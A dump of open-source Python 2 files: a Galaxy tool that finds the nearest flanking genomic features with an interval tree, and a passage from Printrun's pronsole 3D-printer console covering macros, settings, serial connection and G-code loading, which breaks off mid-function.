hajicj/safire
|
build/lib/safire/learning/models/autoencoder.py
|
Python
|
gpl-3.0
| 17,198
|
[
"NEURON"
] |
e8407f60cd3b78ba69977de2e79ce8e809139da5d8a24136ba5d6764cc04abe4
|
#!/usr/bin/env python
#By: Guruprasad Ananda
"""
Fetch closest up/downstream interval from features corresponding to every interval in primary
usage: %prog primary_file features_file out_file direction
-1, --cols1=N,N,N,N: Columns for start, end, strand in first file
-2, --cols2=N,N,N,N: Columns for start, end, strand in second file
"""
from galaxy import eggs
import pkg_resources
pkg_resources.require( "bx-python" )
import sys, traceback, fileinput
from warnings import warn
from bx.cookbook import doc_optparse
from galaxy.tools.util.galaxyops import *
from bx.intervals.io import *
from bx.intervals.operations import quicksect
assert sys.version_info[:2] >= ( 2, 4 )
def get_closest_feature (node, direction, threshold_up, threshold_down, report_func_up, report_func_down):
#direction=1 for +ve strand upstream and -ve strand downstream cases; and it is 0 for +ve strand downstream and -ve strand upstream cases
#threhold_Up is equal to the interval start for +ve strand, and interval end for -ve strand
#threhold_down is equal to the interval end for +ve strand, and interval start for -ve strand
if direction == 1:
if node.maxend < threshold_up:
if node.end == node.maxend:
report_func_up(node)
elif node.right and node.left:
if node.right.maxend == node.maxend:
get_closest_feature(node.right, direction, threshold_up, threshold_down, report_func_up, report_func_down)
elif node.left.maxend == node.maxend:
get_closest_feature(node.left, direction, threshold_up, threshold_down, report_func_up, report_func_down)
elif node.right and node.right.maxend == node.maxend:
get_closest_feature(node.right, direction, threshold_up, threshold_down, report_func_up, report_func_down)
elif node.left and node.left.maxend == node.maxend:
get_closest_feature(node.left, direction, threshold_up, threshold_down, report_func_up, report_func_down)
elif node.minend < threshold_up:
if node.end < threshold_up:
report_func_up(node)
if node.left and node.right:
if node.right.minend < threshold_up:
get_closest_feature(node.right, direction, threshold_up, threshold_down, report_func_up, report_func_down)
if node.left.minend < threshold_up:
get_closest_feature(node.left, direction, threshold_up, threshold_down, report_func_up, report_func_down)
elif node.left:
if node.left.minend < threshold_up:
get_closest_feature(node.left, direction, threshold_up, threshold_down, report_func_up, report_func_down)
elif node.right:
if node.right.minend < threshold_up:
get_closest_feature(node.right, direction, threshold_up, threshold_down, report_func_up, report_func_down)
elif direction == 0:
if node.start > threshold_down:
report_func_down(node)
if node.left:
get_closest_feature(node.left, direction, threshold_up, threshold_down, report_func_up, report_func_down)
else:
if node.right:
get_closest_feature(node.right, direction, threshold_up, threshold_down, report_func_up, report_func_down)
def proximal_region_finder(readers, region, comments=True):
primary = readers[0]
features = readers[1]
either = False
if region == 'Upstream':
up, down = True, False
elif region == 'Downstream':
up, down = False, True
else:
up, down = True, True
if region == 'Either':
either = True
# Read features into memory:
rightTree = quicksect.IntervalTree()
for item in features:
if type( item ) is GenomicInterval:
rightTree.insert( item, features.linenum, item.fields )
for interval in primary:
if type( interval ) is Header:
yield interval
if type( interval ) is Comment and comments:
yield interval
elif type( interval ) == GenomicInterval:
chrom = interval.chrom
start = int(interval.start)
end = int(interval.end)
strand = interval.strand
if chrom not in rightTree.chroms:
continue
else:
root = rightTree.chroms[chrom] #root node for the chrom tree
result_up = []
result_down = []
if (strand == '+' and up) or (strand == '-' and down):
#upstream +ve strand and downstream -ve strand cases
get_closest_feature (root, 1, start, None, lambda node: result_up.append( node ), None)
if (strand == '+' and down) or (strand == '-' and up):
#downstream +ve strand and upstream -ve strand case
get_closest_feature (root, 0, None, end, None, lambda node: result_down.append( node ))
if result_up:
outfields = list(interval)
if len(result_up) > 1: #The results_up list has a list of intervals upstream to the given interval.
ends = []
for n in result_up:
ends.append(n.end)
res_ind = ends.index(max(ends)) #fetch the index of the closest interval i.e. the interval with the max end from the results_up list
else:
res_ind = 0
if not(either):
map(outfields.append, result_up[res_ind].other)
yield outfields
if result_down:
outfields = list(interval)
if not(either):
map(outfields.append, result_down[-1].other) #The last element of result_down will be the closest element to the given interval
yield outfields
if either and (result_up or result_down):
if result_up and result_down:
if abs(start - int(result_up[res_ind].end)) <= abs(end - int(result_down[-1].start)):
map(outfields.append, result_up[res_ind].other)
else:
map(outfields.append, result_down[-1].other) #The last element of result_down will be the closest element to the given interval
elif result_up:
map(outfields.append, result_up[res_ind].other)
elif result_down:
map(outfields.append, result_down[-1].other) #The last element of result_down will be the closest element to the given interval
yield outfields
def main():
options, args = doc_optparse.parse( __doc__ )
try:
chr_col_1, start_col_1, end_col_1, strand_col_1 = parse_cols_arg( options.cols1 )
chr_col_2, start_col_2, end_col_2, strand_col_2 = parse_cols_arg( options.cols2 )
in_fname, in2_fname, out_fname, direction = args
except:
doc_optparse.exception()
g1 = NiceReaderWrapper( fileinput.FileInput( in_fname ),
chrom_col=chr_col_1,
start_col=start_col_1,
end_col=end_col_1,
strand_col=strand_col_1,
fix_strand=True )
g2 = NiceReaderWrapper( fileinput.FileInput( in2_fname ),
chrom_col=chr_col_2,
start_col=start_col_2,
end_col=end_col_2,
strand_col=strand_col_2,
fix_strand=True )
out_file = open( out_fname, "w" )
try:
for line in proximal_region_finder([g1,g2], direction):
if type( line ) is list:
out_file.write( "%s\n" % "\t".join( line ) )
else:
out_file.write( "%s\n" % line )
except ParseError, exc:
fail( "Invalid file format: %s" % str( exc ) )
print "Direction: %s" %(direction)
if g1.skipped > 0:
print skipped( g1, filedesc=" of 1st dataset" )
if g2.skipped > 0:
print skipped( g2, filedesc=" of 2nd dataset" )
if __name__ == "__main__":
main()
|
volpino/Yeps-EURAC
|
tools/new_operations/flanking_features.py
|
Python
|
mit
| 8,583
|
[
"Galaxy"
] |
89c8a77ebc3d6dbb47a00d83829a262b1e01e7f4275edf919c030dc5a3525a0d
|
#!/usr/bin/env python
# This file is part of the Printrun suite.
#
# Printrun is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Printrun is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Printrun. If not, see <http://www.gnu.org/licenses/>.
import cmd
import glob
import os
import time
import threading
import sys
import shutil
import subprocess
import codecs
import argparse
import locale
import logging
import traceback
import re
from serial import SerialException
from . import printcore
from .utils import install_locale, run_command, get_command_output, \
format_time, format_duration, RemainingTimeEstimator, \
get_home_pos, parse_build_dimensions, parse_temperature_report, \
setup_logging
install_locale('pronterface')
from .settings import Settings, BuildDimensionsSetting
from .power import powerset_print_start, powerset_print_stop
from printrun import gcoder
from .rpc import ProntRPC
if os.name == "nt":
try:
import _winreg
except:
pass
READLINE = True
try:
import readline
try:
readline.rl.mode.show_all_if_ambiguous = "on" # config pyreadline on windows
except:
pass
except:
READLINE = False # neither readline module is available
tempreading_exp = re.compile("(^T:| T:)")
REPORT_NONE = 0
REPORT_POS = 1
REPORT_TEMP = 2
REPORT_MANUAL = 4
class Status(object):
def __init__(self):
self.extruder_temp = 0
self.extruder_temp_target = 0
self.bed_temp = 0
self.bed_temp_target = 0
self.print_job = None
self.print_job_progress = 1.0
def update_tempreading(self, tempstr):
temps = parse_temperature_report(tempstr)
if "T0" in temps and temps["T0"][0]: hotend_temp = float(temps["T0"][0])
elif "T" in temps and temps["T"][0]: hotend_temp = float(temps["T"][0])
else: hotend_temp = None
if "T0" in temps and temps["T0"][1]: hotend_setpoint = float(temps["T0"][1])
elif "T" in temps and temps["T"][1]: hotend_setpoint = float(temps["T"][1])
else: hotend_setpoint = None
if hotend_temp is not None:
self.extruder_temp = hotend_temp
if hotend_setpoint is not None:
self.extruder_temp_target = hotend_setpoint
bed_temp = float(temps["B"][0]) if "B" in temps and temps["B"][0] else None
if bed_temp is not None:
self.bed_temp = bed_temp
setpoint = temps["B"][1]
if setpoint:
self.bed_temp_target = float(setpoint)
@property
def bed_enabled(self):
return self.bed_temp != 0
@property
def extruder_enabled(self):
return self.extruder_temp != 0
class pronsole(cmd.Cmd):
def __init__(self):
cmd.Cmd.__init__(self)
if not READLINE:
self.completekey = None
self.status = Status()
self.dynamic_temp = False
self.compute_eta = None
self.statuscheck = False
self.status_thread = None
self.monitor_interval = 3
self.p = printcore.printcore()
self.p.recvcb = self.recvcb
self.p.startcb = self.startcb
self.p.endcb = self.endcb
self.p.layerchangecb = self.layer_change_cb
self.p.process_host_command = self.process_host_command
self.recvlisteners = []
self.in_macro = False
self.p.onlinecb = self.online
self.p.errorcb = self.logError
self.fgcode = None
self.filename = None
self.rpc_server = None
self.curlayer = 0
self.sdlisting = 0
self.sdlisting_echo = 0
self.sdfiles = []
self.paused = False
self.sdprinting = 0
self.uploading = 0 # Unused, just for pronterface generalization
self.temps = {"pla": "185", "abs": "230", "off": "0"}
self.bedtemps = {"pla": "60", "abs": "110", "off": "0"}
self.percentdone = 0
self.posreport = ""
self.tempreadings = ""
self.userm114 = 0
self.userm105 = 0
self.m105_waitcycles = 0
self.macros = {}
self.history_file = "~/.pronsole-history"
self.rc_loaded = False
self.processing_rc = False
self.processing_args = False
self.settings = Settings(self)
self.settings._add(BuildDimensionsSetting("build_dimensions", "200x200x100+0+0+0+0+0+0", _("Build dimensions"), _("Dimensions of Build Platform\n & optional offset of origin\n & optional switch position\n\nExamples:\n XXXxYYY\n XXX,YYY,ZZZ\n XXXxYYYxZZZ+OffX+OffY+OffZ\nXXXxYYYxZZZ+OffX+OffY+OffZ+HomeX+HomeY+HomeZ"), "Printer"), self.update_build_dimensions)
self.settings._port_list = self.scanserial
self.settings._temperature_abs_cb = self.set_temp_preset
self.settings._temperature_pla_cb = self.set_temp_preset
self.settings._bedtemp_abs_cb = self.set_temp_preset
self.settings._bedtemp_pla_cb = self.set_temp_preset
self.update_build_dimensions(None, self.settings.build_dimensions)
self.update_tcp_streaming_mode(None, self.settings.tcp_streaming_mode)
self.monitoring = 0
self.starttime = 0
self.extra_print_time = 0
self.silent = False
self.commandprefixes = 'MGT$'
self.promptstrs = {"offline": "%(bold)soffline>%(normal)s ",
"fallback": "%(bold)sPC>%(normal)s ",
"macro": "%(bold)s..>%(normal)s ",
"online": "%(bold)sT:%(extruder_temp_fancy)s%(progress_fancy)s>%(normal)s "}
# --------------------------------------------------------------
# General console handling
# --------------------------------------------------------------
def postloop(self):
self.p.disconnect()
cmd.Cmd.postloop(self)
def preloop(self):
self.log(_("Welcome to the printer console! Type \"help\" for a list of available commands."))
self.prompt = self.promptf()
cmd.Cmd.preloop(self)
# We replace this function, defined in cmd.py .
# It's default behavior with regards to Ctr-C
# and Ctr-D doesn't make much sense...
def cmdloop(self, intro=None):
"""Repeatedly issue a prompt, accept input, parse an initial prefix
off the received input, and dispatch to action methods, passing them
the remainder of the line as argument.
"""
self.preloop()
if self.use_rawinput and self.completekey:
try:
import readline
self.old_completer = readline.get_completer()
readline.set_completer(self.complete)
readline.parse_and_bind(self.completekey + ": complete")
history = os.path.expanduser(self.history_file)
if os.path.exists(history):
readline.read_history_file(history)
except ImportError:
pass
try:
if intro is not None:
self.intro = intro
if self.intro:
self.stdout.write(str(self.intro) + "\n")
stop = None
while not stop:
if self.cmdqueue:
line = self.cmdqueue.pop(0)
else:
if self.use_rawinput:
try:
line = raw_input(self.prompt)
except EOFError:
self.log("")
self.do_exit("")
except KeyboardInterrupt:
self.log("")
line = ""
else:
self.stdout.write(self.prompt)
self.stdout.flush()
line = self.stdin.readline()
if not len(line):
line = ""
else:
line = line.rstrip('\r\n')
line = self.precmd(line)
stop = self.onecmd(line)
stop = self.postcmd(stop, line)
self.postloop()
finally:
if self.use_rawinput and self.completekey:
try:
import readline
readline.set_completer(self.old_completer)
readline.write_history_file(history)
except ImportError:
pass
def confirm(self):
y_or_n = raw_input("y/n: ")
if y_or_n == "y":
return True
elif y_or_n != "n":
return self.confirm()
return False
def log(self, *msg):
msg = u"".join(unicode(i) for i in msg)
logging.info(msg)
def logError(self, *msg):
msg = u"".join(unicode(i) for i in msg)
logging.error(msg)
if not self.settings.error_command:
return
output = get_command_output(self.settings.error_command, {"$m": msg})
if output:
self.log("Error command output:")
self.log(output.rstrip())
def promptf(self):
"""A function to generate prompts so that we can do dynamic prompts. """
if self.in_macro:
promptstr = self.promptstrs["macro"]
elif not self.p.online:
promptstr = self.promptstrs["offline"]
elif self.status.extruder_enabled:
promptstr = self.promptstrs["online"]
else:
promptstr = self.promptstrs["fallback"]
if "%" not in promptstr:
return promptstr
else:
specials = {}
specials["extruder_temp"] = str(int(self.status.extruder_temp))
specials["extruder_temp_target"] = str(int(self.status.extruder_temp_target))
if self.status.extruder_temp_target == 0:
specials["extruder_temp_fancy"] = str(int(self.status.extruder_temp))
else:
specials["extruder_temp_fancy"] = "%s/%s" % (str(int(self.status.extruder_temp)), str(int(self.status.extruder_temp_target)))
if self.p.printing:
progress = int(1000 * float(self.p.queueindex) / len(self.p.mainqueue)) / 10
elif self.sdprinting:
progress = self.percentdone
else:
progress = 0.0
specials["progress"] = str(progress)
if self.p.printing or self.sdprinting:
specials["progress_fancy"] = " " + str(progress) + "%"
else:
specials["progress_fancy"] = ""
specials["bold"] = "\033[01m"
specials["normal"] = "\033[00m"
return promptstr % specials
def postcmd(self, stop, line):
""" A hook we override to generate prompts after
each command is executed, for the next prompt.
We also use it to send M105 commands so that
temp info gets updated for the prompt."""
if self.p.online and self.dynamic_temp:
self.p.send_now("M105")
self.prompt = self.promptf()
return stop
def kill(self):
self.statuscheck = False
if self.status_thread:
self.status_thread.join()
self.status_thread = None
if self.rpc_server is not None:
self.rpc_server.shutdown()
def write_prompt(self):
sys.stdout.write(self.promptf())
sys.stdout.flush()
def help_help(self, l = ""):
self.do_help("")
def do_gcodes(self, l = ""):
self.help_gcodes()
def help_gcodes(self):
self.log("Gcodes are passed through to the printer as they are")
def precmd(self, line):
if line.upper().startswith("M114"):
self.userm114 += 1
elif line.upper().startswith("M105"):
self.userm105 += 1
return line
def help_shell(self):
self.log("Executes a python command. Example:")
self.log("! os.listdir('.')")
def do_shell(self, l):
exec(l)
def emptyline(self):
"""Called when an empty line is entered - do not remove"""
pass
def default(self, l):
if l[0].upper() in self.commandprefixes.upper():
if self.p and self.p.online:
if not self.p.loud:
self.log("SENDING:" + l.upper())
self.p.send_now(l.upper())
else:
self.logError(_("Printer is not online."))
return
elif l[0] == "@":
if self.p and self.p.online:
if not self.p.loud:
self.log("SENDING:" + l[1:])
self.p.send_now(l[1:])
else:
self.logError(_("Printer is not online."))
return
else:
cmd.Cmd.default(self, l)
def do_exit(self, l):
if self.status.extruder_temp_target != 0:
self.log("Setting extruder temp to 0")
self.p.send_now("M104 S0.0")
if self.status.bed_enabled:
if self.status.bed_temp_target != 0:
self.log("Setting bed temp to 0")
self.p.send_now("M140 S0.0")
self.log("Disconnecting from printer...")
if self.p.printing:
self.log(_("Are you sure you want to exit while printing?\n\
(this will terminate the print)."))
if not self.confirm():
return
self.log(_("Exiting program. Goodbye!"))
self.p.disconnect()
self.kill()
sys.exit()
def help_exit(self):
self.log(_("Disconnects from the printer and exits the program."))
# --------------------------------------------------------------
# Macro handling
# --------------------------------------------------------------
def complete_macro(self, text, line, begidx, endidx):
if (len(line.split()) == 2 and line[-1] != " ") or (len(line.split()) == 1 and line[-1] == " "):
return [i for i in self.macros.keys() if i.startswith(text)]
elif len(line.split()) == 3 or (len(line.split()) == 2 and line[-1] == " "):
return [i for i in ["/D", "/S"] + self.completenames(text) if i.startswith(text)]
else:
return []
def hook_macro(self, l):
l = l.rstrip()
ls = l.lstrip()
ws = l[:len(l) - len(ls)] # just leading whitespace
if len(ws) == 0:
self.end_macro()
# pass the unprocessed line to regular command processor to not require empty line in .pronsolerc
return self.onecmd(l)
self.cur_macro_def += l + "\n"
def end_macro(self):
if "onecmd" in self.__dict__: del self.onecmd # remove override
self.in_macro = False
self.prompt = self.promptf()
if self.cur_macro_def != "":
self.macros[self.cur_macro_name] = self.cur_macro_def
macro = self.compile_macro(self.cur_macro_name, self.cur_macro_def)
setattr(self.__class__, "do_" + self.cur_macro_name, lambda self, largs, macro = macro: macro(self, *largs.split()))
setattr(self.__class__, "help_" + self.cur_macro_name, lambda self, macro_name = self.cur_macro_name: self.subhelp_macro(macro_name))
if not self.processing_rc:
self.log("Macro '" + self.cur_macro_name + "' defined")
# save it
if not self.processing_args:
macro_key = "macro " + self.cur_macro_name
macro_def = macro_key
if "\n" in self.cur_macro_def:
macro_def += "\n"
else:
macro_def += " "
macro_def += self.cur_macro_def
self.save_in_rc(macro_key, macro_def)
else:
self.logError("Empty macro - cancelled")
del self.cur_macro_name, self.cur_macro_def
def compile_macro_line(self, line):
line = line.rstrip()
ls = line.lstrip()
ws = line[:len(line) - len(ls)] # just leading whitespace
if ls == "" or ls.startswith('#'): return "" # no code
if ls.startswith('!'):
return ws + ls[1:] + "\n" # python mode
else:
ls = ls.replace('"', '\\"') # need to escape double quotes
ret = ws + 'self.precmd("' + ls + '".format(*arg))\n' # parametric command mode
return ret + ws + 'self.onecmd("' + ls + '".format(*arg))\n'
def compile_macro(self, macro_name, macro_def):
if macro_def.strip() == "":
self.logError("Empty macro - cancelled")
return
macro = None
pycode = "def macro(self,*arg):\n"
if "\n" not in macro_def.strip():
pycode += self.compile_macro_line(" " + macro_def.strip())
else:
lines = macro_def.split("\n")
for l in lines:
pycode += self.compile_macro_line(l)
exec pycode
return macro
def start_macro(self, macro_name, prev_definition = "", suppress_instructions = False):
if not self.processing_rc and not suppress_instructions:
self.logError("Enter macro using indented lines, end with empty line")
self.cur_macro_name = macro_name
self.cur_macro_def = ""
self.onecmd = self.hook_macro # override onecmd temporarily
self.in_macro = False
self.prompt = self.promptf()
def delete_macro(self, macro_name):
if macro_name in self.macros.keys():
delattr(self.__class__, "do_" + macro_name)
del self.macros[macro_name]
self.log("Macro '" + macro_name + "' removed")
if not self.processing_rc and not self.processing_args:
self.save_in_rc("macro " + macro_name, "")
else:
self.logError("Macro '" + macro_name + "' is not defined")
def do_macro(self, args):
if args.strip() == "":
self.print_topics("User-defined macros", map(str, self.macros.keys()), 15, 80)
return
arglist = args.split(None, 1)
macro_name = arglist[0]
if macro_name not in self.macros and hasattr(self.__class__, "do_" + macro_name):
self.logError("Name '" + macro_name + "' is being used by built-in command")
return
if len(arglist) == 2:
macro_def = arglist[1]
if macro_def.lower() == "/d":
self.delete_macro(macro_name)
return
if macro_def.lower() == "/s":
self.subhelp_macro(macro_name)
return
self.cur_macro_def = macro_def
self.cur_macro_name = macro_name
self.end_macro()
return
if macro_name in self.macros:
self.start_macro(macro_name, self.macros[macro_name])
else:
self.start_macro(macro_name)
def help_macro(self):
self.log("Define single-line macro: macro <name> <definition>")
self.log("Define multi-line macro: macro <name>")
self.log("Enter macro definition in indented lines. Use {0} .. {N} to substitute macro arguments")
self.log("Enter python code, prefixed with ! Use arg[0] .. arg[N] to substitute macro arguments")
self.log("Delete macro: macro <name> /d")
self.log("Show macro definition: macro <name> /s")
self.log("'macro' without arguments displays list of defined macros")
def subhelp_macro(self, macro_name):
if macro_name in self.macros.keys():
macro_def = self.macros[macro_name]
if "\n" in macro_def:
self.log("Macro '" + macro_name + "' defined as:")
self.log(self.macros[macro_name] + "----------------")
else:
self.log("Macro '" + macro_name + "' defined as: '" + macro_def + "'")
else:
self.logError("Macro '" + macro_name + "' is not defined")
# --------------------------------------------------------------
# Configuration handling
# --------------------------------------------------------------
def set(self, var, str):
try:
t = type(getattr(self.settings, var))
value = self.settings._set(var, str)
if not self.processing_rc and not self.processing_args:
self.save_in_rc("set " + var, "set %s %s" % (var, value))
except AttributeError:
logging.debug(_("Unknown variable '%s'") % var)
except ValueError, ve:
if hasattr(ve, "from_validator"):
self.logError(_("Bad value %s for variable '%s': %s") % (str, var, ve.args[0]))
else:
self.logError(_("Bad value for variable '%s', expecting %s (%s)") % (var, repr(t)[1:-1], ve.args[0]))
def do_set(self, argl):
args = argl.split(None, 1)
if len(args) < 1:
for k in [kk for kk in dir(self.settings) if not kk.startswith("_")]:
self.log("%s = %s" % (k, str(getattr(self.settings, k))))
return
if len(args) < 2:
# Try getting the default value of the setting to check whether it
# actually exists
try:
getattr(self.settings, args[0])
except AttributeError:
logging.warning("Unknown variable '%s'" % args[0])
return
self.set(args[0], args[1])
def help_set(self):
self.log("Set variable: set <variable> <value>")
self.log("Show variable: set <variable>")
self.log("'set' without arguments displays all variables")
def complete_set(self, text, line, begidx, endidx):
if (len(line.split()) == 2 and line[-1] != " ") or (len(line.split()) == 1 and line[-1] == " "):
return [i for i in dir(self.settings) if not i.startswith("_") and i.startswith(text)]
elif len(line.split()) == 3 or (len(line.split()) == 2 and line[-1] == " "):
return [i for i in self.settings._tabcomplete(line.split()[1]) if i.startswith(text)]
else:
return []
def load_rc(self, rc_filename):
self.processing_rc = True
try:
rc = codecs.open(rc_filename, "r", "utf-8")
self.rc_filename = os.path.abspath(rc_filename)
for rc_cmd in rc:
if not rc_cmd.lstrip().startswith("#"):
self.onecmd(rc_cmd)
rc.close()
if hasattr(self, "cur_macro_def"):
self.end_macro()
self.rc_loaded = True
finally:
self.processing_rc = False
def load_default_rc(self, rc_filename = ".pronsolerc"):
if rc_filename == ".pronsolerc" and hasattr(sys, "frozen") and sys.frozen in ["windows_exe", "console_exe"]:
rc_filename = "printrunconf.ini"
try:
try:
self.load_rc(os.path.join(os.path.expanduser("~"), rc_filename))
except IOError:
self.load_rc(rc_filename)
except IOError:
# make sure the filename is initialized
self.rc_filename = os.path.abspath(os.path.join(os.path.expanduser("~"), rc_filename))
def save_in_rc(self, key, definition):
"""
Saves or updates macro or other definitions in .pronsolerc
key is prefix that determines what is being defined/updated (e.g. 'macro foo')
definition is the full definition (that is written to file). (e.g. 'macro foo move x 10')
Set key as empty string to just add (and not overwrite)
Set definition as empty string to remove it from .pronsolerc
To delete line from .pronsolerc, set key as the line contents, and definition as empty string
Only first definition with given key is overwritten.
Updates are made in the same file position.
Additions are made to the end of the file.
"""
rci, rco = None, None
if definition != "" and not definition.endswith("\n"):
definition += "\n"
try:
written = False
if os.path.exists(self.rc_filename):
shutil.copy(self.rc_filename, self.rc_filename + "~bak")
rci = codecs.open(self.rc_filename + "~bak", "r", "utf-8")
rco = codecs.open(self.rc_filename + "~new", "w", "utf-8")
if rci is not None:
overwriting = False
for rc_cmd in rci:
l = rc_cmd.rstrip()
ls = l.lstrip()
ws = l[:len(l) - len(ls)] # just leading whitespace
if overwriting and len(ws) == 0:
overwriting = False
if not written and key != "" and rc_cmd.startswith(key) and (rc_cmd + "\n")[len(key)].isspace():
overwriting = True
written = True
rco.write(definition)
if not overwriting:
rco.write(rc_cmd)
if not rc_cmd.endswith("\n"): rco.write("\n")
if not written:
rco.write(definition)
if rci is not None:
rci.close()
rco.close()
shutil.move(self.rc_filename + "~new", self.rc_filename)
# if definition != "":
# self.log("Saved '"+key+"' to '"+self.rc_filename+"'")
# else:
# self.log("Removed '"+key+"' from '"+self.rc_filename+"'")
except Exception, e:
self.logError("Saving failed for ", key + ":", str(e))
finally:
del rci, rco
# --------------------------------------------------------------
# Configuration update callbacks
# --------------------------------------------------------------
def update_build_dimensions(self, param, value):
self.build_dimensions_list = parse_build_dimensions(value)
self.p.analyzer.home_pos = get_home_pos(self.build_dimensions_list)
def update_tcp_streaming_mode(self, param, value):
self.p.tcp_streaming_mode = self.settings.tcp_streaming_mode
def update_rpc_server(self, param, value):
if value:
if self.rpc_server is None:
self.rpc_server = ProntRPC(self)
else:
if self.rpc_server is not None:
self.rpc_server.shutdown()
self.rpc_server = None
# --------------------------------------------------------------
# Command line options handling
# --------------------------------------------------------------
def add_cmdline_arguments(self, parser):
parser.add_argument('-v', '--verbose', help = _("increase verbosity"), action = "store_true")
parser.add_argument('-c', '--conf', '--config', help = _("load this file on startup instead of .pronsolerc ; you may chain config files, if so settings auto-save will use the last specified file"), action = "append", default = [])
parser.add_argument('-e', '--execute', help = _("executes command after configuration/.pronsolerc is loaded ; macros/settings from these commands are not autosaved"), action = "append", default = [])
parser.add_argument('filename', nargs='?', help = _("file to load"))
def process_cmdline_arguments(self, args):
if args.verbose:
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
for config in args.conf:
self.load_rc(config)
if not self.rc_loaded:
self.load_default_rc()
self.processing_args = True
for command in args.execute:
self.onecmd(command)
self.processing_args = False
self.update_rpc_server(None, self.settings.rpc_server)
if args.filename:
filename = args.filename.decode(locale.getpreferredencoding())
self.cmdline_filename_callback(filename)
def cmdline_filename_callback(self, filename):
self.do_load(filename)
def parse_cmdline(self, args):
parser = argparse.ArgumentParser(description = 'Printrun 3D printer interface')
self.add_cmdline_arguments(parser)
args = [arg for arg in args if not arg.startswith("-psn")]
args = parser.parse_args(args = args)
self.process_cmdline_arguments(args)
setup_logging(sys.stdout, self.settings.log_path, True)
# --------------------------------------------------------------
# Printer connection handling
# --------------------------------------------------------------
def connect_to_printer(self, port, baud, dtr):
try:
self.p.connect(port, baud, dtr)
except SerialException as e:
# Currently, there is no errno, but it should be there in the future
if e.errno == 2:
self.logError(_("Error: You are trying to connect to a non-existing port."))
elif e.errno == 8:
self.logError(_("Error: You don't have permission to open %s.") % port)
self.logError(_("You might need to add yourself to the dialout group."))
else:
self.logError(traceback.format_exc())
# Kill the scope anyway
return False
except OSError as e:
if e.errno == 2:
self.logError(_("Error: You are trying to connect to a non-existing port."))
else:
self.logError(traceback.format_exc())
return False
self.statuscheck = True
self.status_thread = threading.Thread(target = self.statuschecker)
self.status_thread.start()
return True
def do_connect(self, l):
a = l.split()
p = self.scanserial()
port = self.settings.port
if (port == "" or port not in p) and len(p) > 0:
port = p[0]
baud = self.settings.baudrate or 115200
if len(a) > 0:
port = a[0]
if len(a) > 1:
try:
baud = int(a[1])
except:
self.log("Bad baud value '" + a[1] + "' ignored")
if len(p) == 0 and not port:
self.log("No serial ports detected - please specify a port")
return
if len(a) == 0:
self.log("No port specified - connecting to %s at %dbps" % (port, baud))
if port != self.settings.port:
self.settings.port = port
self.save_in_rc("set port", "set port %s" % port)
if baud != self.settings.baudrate:
self.settings.baudrate = baud
self.save_in_rc("set baudrate", "set baudrate %d" % baud)
self.connect_to_printer(port, baud, self.settings.dtr)
def help_connect(self):
self.log("Connect to printer")
self.log("connect <port> <baudrate>")
self.log("If port and baudrate are not specified, connects to first detected port at 115200bps")
ports = self.scanserial()
if ports:
self.log("Available ports: ", " ".join(ports))
else:
self.log("No serial ports were automatically found.")
def complete_connect(self, text, line, begidx, endidx):
if (len(line.split()) == 2 and line[-1] != " ") or (len(line.split()) == 1 and line[-1] == " "):
return [i for i in self.scanserial() if i.startswith(text)]
elif len(line.split()) == 3 or (len(line.split()) == 2 and line[-1] == " "):
return [i for i in ["2400", "9600", "19200", "38400", "57600", "115200"] if i.startswith(text)]
else:
return []
def scanserial(self):
"""scan for available ports. return a list of device names."""
baselist = []
if os.name == "nt":
try:
key = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, "HARDWARE\\DEVICEMAP\\SERIALCOMM")
i = 0
while(1):
baselist += [_winreg.EnumValue(key, i)[1]]
i += 1
except:
pass
for g in ['/dev/ttyUSB*', '/dev/ttyACM*', "/dev/tty.*", "/dev/cu.*", "/dev/rfcomm*"]:
baselist += glob.glob(g)
return filter(self._bluetoothSerialFilter, baselist)
def _bluetoothSerialFilter(self, serial):
return not ("Bluetooth" in serial or "FireFly" in serial)
def online(self):
self.log("\rPrinter is now online")
self.write_prompt()
def do_disconnect(self, l):
self.p.disconnect()
def help_disconnect(self):
self.log("Disconnects from the printer")
def do_block_until_online(self, l):
while not self.p.online:
time.sleep(0.1)
def help_block_until_online(self, l):
self.log("Blocks until printer is online")
self.log("Warning: if something goes wrong, this can block pronsole forever")
# --------------------------------------------------------------
# Printer status monitoring
# --------------------------------------------------------------
def statuschecker_inner(self, do_monitoring = True):
if self.p.online:
if self.p.writefailures >= 4:
self.logError(_("Disconnecting after 4 failed writes."))
self.status_thread = None
self.disconnect()
return
if do_monitoring:
if self.sdprinting and not self.paused:
self.p.send_now("M27")
if self.m105_waitcycles % 10 == 0:
self.p.send_now("M105")
self.m105_waitcycles += 1
cur_time = time.time()
wait_time = 0
while time.time() < cur_time + self.monitor_interval - 0.25:
if not self.statuscheck:
break
time.sleep(0.25)
# Safeguard: if system time changes and goes back in the past,
# we could get stuck almost forever
wait_time += 0.25
if wait_time > self.monitor_interval - 0.25:
break
# Always sleep at least a bit, if something goes wrong with the
# system time we'll avoid freezing the whole app this way
time.sleep(0.25)
def statuschecker(self):
while self.statuscheck:
self.statuschecker_inner()
# --------------------------------------------------------------
# File loading handling
# --------------------------------------------------------------
def do_load(self, filename):
self._do_load(filename)
def _do_load(self, filename):
if not filename:
self.logError("No file name given.")
return
self.log(_("Loading file: %s") % filename)
if not os.path.exists(filename):
self.logError("File not found!")
return
self.load_gcode(filename)
self.log(_("Loaded %s, %d lines.") % (filename, len(self.fgcode)))
self.log(_("Estimated duration: %d layers, %s") % self.fgcode.estimate_duration())
def load_gcode(self, filename, layer_callback = None, gcode = None):
if gcode is None:
self.fgcode = gcoder.LightGCode(deferred = True)
else:
self.fgcode = gcode
self.fgcode.prepare(open(filename, "rU"),
get_home_pos(self.build_dimensions_list),
layer_callback = layer_callback)
self.fgcode.estimate_duration()
self.filename = filename
def complete_load(self, text, line, begidx, endidx):
s = line.split()
if len(s) > 2:
return []
if (len(s) == 1 and line[-1] == " ") or (len(s) == 2 and line[-1] != " "):
if len(s) > 1:
return [i[len(s[1]) - len(text):] for i in glob.glob(s[1] + "*/") + glob.glob(s[1] + "*.g*")]
else:
return glob.glob("*/") + glob.glob("*.g*")
def help_load(self):
self.log("Loads a gcode file (with tab-completion)")
def do_slice(self, l):
l = l.split()
if len(l) == 0:
